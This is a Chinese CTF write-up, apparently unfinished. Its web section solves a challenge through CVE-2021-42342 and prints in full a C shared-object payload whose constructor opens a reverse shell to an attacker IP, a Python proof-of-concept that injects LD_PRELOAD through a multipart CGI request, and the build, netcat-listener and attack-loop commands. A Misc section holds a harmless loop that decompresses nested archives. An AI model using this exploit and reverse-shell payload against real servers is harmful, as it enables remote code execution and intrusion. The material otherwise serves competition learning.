[施工中,待后续补充]
Web
gogogo
看dockefile,查阅可知是CVE-2021-42342
参考p神文章 https://tttang.com/archive/1399/
payload.c
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
char *server_ip="xx.xx.xx.xx";
uint32_t server_port=7777;
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
exit(0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
char *argv[]={"cat","/flag", NULL};
char *envp[]={0,NULL};
execve("/bin/cat", argv, envp);
execve("/bin/bash", 0, 0);
}poc.py
import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult
PAYLOAD_MAX_LENGTH = 16384 - 200
def exploit(client, parts: ParseResult, payload: bytes):
path = '/' if not parts.path else parts.path
boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
padding = 'a' * 2000
content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
data = fr'''POST {path} HTTP/1.1
Host: {parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={boundary}
Content-Length: {content_length}
--{boundary}
Content-Disposition: form-data; name="LD_PRELOAD";
/proc/self/fd/7
--{boundary}
Content-Disposition: form-data; name="data"; filename="1.txt"
Content-Type: text/plain
#payload#{padding}
--{boundary}--
'''.replace('\n', '\r\n')
data = data.encode().replace(b'#payload#', payload)
client.send(data)
resp = client.recv(20480)
print(resp.decode())
def main():
target = sys.argv[1]
payload_filename = sys.argv[2]
with open(payload_filename, 'rb') as f:
data = f.read()
if len(data) > PAYLOAD_MAX_LENGTH:
raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)
parts = urlparse(target)
port = parts.port
if not parts.port:
if parts.scheme == 'https':
port = 443
else:
port = 80
context = ssl.create_default_context()
with socket.create_connection((parts.hostname, port), timeout=8) as client:
if parts.scheme == 'https':
with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:
exploit(ssock, parts, data)
else:
exploit(client, parts, data)
if __name__ == '__main__':
main()gcc -s -shared -fPIC ./payload.c -o shell.so
nc -lvnp 7777
while true; do python3 poc.py http://123.60.84.229:10218/cgi-bin/hello shell.so; done;
Misc
signin
循环嗯解压缩包
while :
do
file=$(file ./bbb/flag | grep bzip2)
if [ -n "$file" ];
then
mv /root/work/aaa/bbb/flag /root/work/aaa/bbb/flag.bz2
bunzip2 /root/work/aaa/bbb/flag.bz2
fi
file=$(file ./bbb/flag | grep XZ)
if [ -n "$file" ];
then
7z x /root/work/aaa/bbb/flag -o/root/work/aaa/bbb
rm /root/work/aaa/bbb/flag
mv /root/work/aaa/bbb/flag~ /root/work/aaa/bbb/flag
fi
file=$(file ./bbb/flag | grep LZMA)
if [ -n "$file" ];
then
mv /root/work/aaa/bbb/flag /root/work/aaa/bbb/flag.lzma
lzma -d /root/work/aaa/bbb/flag.lzma
fi
file=$(file ./bbb/flag | grep gzip)
if [ -n "$file" ];
then
mv /root/work/aaa/bbb/flag /root/work/aaa/bbb/flag.gz
gzip -d /root/work/aaa/bbb/flag.gz
fi
file=$(file ./bbb/flag | grep Zstandard)
if [ -n "$file" ];
then
mv /root/work/aaa/bbb/flag /root/work/aaa/bbb/flag.zst
zstd -d /root/work/aaa/bbb/flag.zst
rm /root/work/aaa/bbb/flag/flag.zst
fi
done
您好 看了您幾篇web文章後覺得收穫很多
最近也在摸索web題目
但有兩題一直沒什麼頭緒
不知大佬有沒有空幫小妹看看!
可以加我的联系方式